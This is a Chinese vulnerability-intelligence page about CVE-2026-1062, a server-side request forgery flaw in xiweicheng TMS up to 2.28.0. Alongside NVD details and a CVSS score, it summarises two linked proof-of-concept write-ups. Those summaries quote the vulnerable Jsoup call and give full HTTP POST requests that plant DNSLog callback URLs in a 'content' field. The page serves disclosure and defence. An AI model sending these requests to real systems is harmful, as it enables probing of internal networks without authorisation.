支持本站 — 捐款将帮助我们持续运营

目标:1000 元,已筹:736

73.6%
一、 漏洞 CVE-2026-1062 基础信息
漏洞信息
                                        # xiweicheng TMS 漏洞,版本未知,服务器端请求伪造。

## 概述
xiweicheng TMS 在版本 2.28.0 及以下存在服务器端请求伪造(SSRF)漏洞,位于 `src/main/java/com/lhjz/portal/util/HtmlUtil.java` 文件的 `Summary` 函数。

## 影响版本
xiweicheng TMS ≤ 2.28.0

## 细节
`HtmlUtil.java` 中的 `Summary` 函数未对传入的 `url` 参数进行有效校验和过滤,攻击者可操控该参数发起任意网络请求。

## 影响
攻击者可利用该漏洞从服务器端发起远程请求,可能访问内部系统或绕过防火墙限制,实现信息泄露、服务探测或进一步攻击。漏洞利用方式已公开,存在被远程利用的风险。
                                        
神龙判断

是否为 Web 类漏洞: 未知

判断理由:

N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
xiweicheng TMS HtmlUtil.java summary server-side request forgery
来源:美国国家漏洞数据库 NVD
漏洞描述信息
A flaw has been found in xiweicheng TMS up to 2.28.0. This affects the function Summary of the file src/main/java/com/lhjz/portal/util/HtmlUtil.java. This manipulation of the argument url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been published and may be used.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
来源:美国国家漏洞数据库 NVD
漏洞类别
服务端请求伪造(SSRF)
来源:美国国家漏洞数据库 NVD
二、漏洞 CVE-2026-1062 的公开POC
#POC 描述源链接神龙链接
三、漏洞 CVE-2026-1062 的情报信息
  • 标题: CVE-md/商户商城—商城开发tms/SSRF(2).md at main · bkglfpp/CVE-md · GitHub -- 🔗来源链接

    标签:exploit

    神龙速读:
                                            ### 关键信息
    
    #### 漏洞描述
    - **系统名称**: Merchant Mall 
    - **系统版本**: TMS
    - **漏洞类型**: SSRF (Server-Side Request Forgery)
    
    #### 漏洞复现
    - **文件位置**: `src/main/java/com/lhjz/portal/util/HtmlUtil.java`
    - **易受攻击参数**: `content`
    
    #### 代码示例
    - **涉及类**: `BlogController.java`, `AsyncTask.java`, `HtmlUtil.java`
    - **关键代码段**:
      ```java
      public static String summary(String url) {
          try {
              Document doc = Jsoup.connect(url).get(); // SSRF点
          } catch (IOException e) {
              e.printStackTrace();
          }
          ...
      }
      ```
    
    #### 攻击步骤
    - **攻击者构造参数**: `content=http://asnmlzkhx.zaza.eu.org`
    - **请求示例**:
      ```http
      POST /admin/blog/comment/create HTTP/1.1
      Host: 127.0.0.1:8080
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 65
    
      basePath=&id=1&content=http://asnmlzkhx.zaza.eu.org&editor=&uuid=
      ```
    
    #### DNS Log
    - **使用的工具**: Yakit 自带的 DNSLog 反连服务
    - **激活域名**: `asnmlzkhx.zaza.eu.org`
    - **记录**: 记录了DNS请求的时间戳和IP地址
    
    #### 数据包
    - **完整的HTTP请求示例**:
      ```http
      POST /admin/blog/comment/create HTTP/1.1
      Host: 127.0.0.1:8080
      Content-Type: application/x-www-form-urlencoded
    
      basePath=&id=1&content=http://asnmlzkhx.zaza.eu.org&editor=&uuid=
      ```
                                            
    CVE-md/商户商城—商城开发tms/SSRF(2).md at main · bkglfpp/CVE-md · GitHub
  • 标题: CVE-md/商户商城—商城开发tms/SSRF(1).md at main · bkglfpp/CVE-md · GitHub -- 🔗来源链接

    标签:related

    神龙速读:
                                            ## 关键信息总结
    
    ### 漏洞概述
    - **漏洞类型**: SSRF (Server-Side Request Forgery)
    - **影响系统**: Merchant Mall - 商户商城的TMS系统
    
    ### 漏洞描述
    - **文件位置**: `src/main/java/com/lhjz/portal/util/HtmlUtil.java`
    - **漏洞参数**: `content`
    - **关键代码位置**: `HtmlUtil.java` 中的 Line 97
    
    ### 漏洞复现步骤
    
    #### 触发点
    - **代码片段**: 
        ```java
        Document doc = Jsoup.connect(url).get();
        ```
    
    - **数据流**: 从用户输入的`content`参数中提取的`lastLine`值在没有特殊处理的情况下被传入该函数,导致SSRF漏洞。
    
    #### 请求细节
    - **请求方法**: POST
    - **URL**: `/admin/chat/channel/create`
    - **关键参数**: `content`参数中包含可控制的URL值 (`http://vqeeedzoaif.zaza.eu.org`)
    
    #### 后果
    - 攻击者可以通过构造特定的请求,利用`content`参数中的URL值,对内网进行探测和攻击。
    
    ### 验证
    - 通过向`/admin/chat/channel/create`接口发送包含特定URL的POST请求,可以观察到服务器尝试访问该URL,验证了SSRF漏洞的存在。
                                            
    CVE-md/商户商城—商城开发tms/SSRF(1).md at main · bkglfpp/CVE-md · GitHub
  • 标题: Login required -- 🔗来源链接

    标签:signaturepermissions-required

    神龙速读:
                                            - **Vulnerability ID**: VDB-341630
    - **CVE Identifier**: CVE-2026-1062
    - **EUVD Identifier**: EUVD-2026-3131
    - **Affected Software**: XIWEICHENG TMS up to 2.28.0
    - **Vulnerable File**: HTMLUtil.java
    - **Vulnerability Type**: URL Server-Side Request Forgery
    - **Access Note**: Requires login to view details
                                            
    Login required
  • https://vuldb.com/?id.341630vdb-entrytechnical-description
  • https://vuldb.com/?submit.731241third-party-advisory
  • https://vuldb.com/?submit.731242third-party-advisory
  • https://nvd.nist.gov/vuln/detail/CVE-2026-1062
四、漏洞 CVE-2026-1062 的评论

暂无评论


发表评论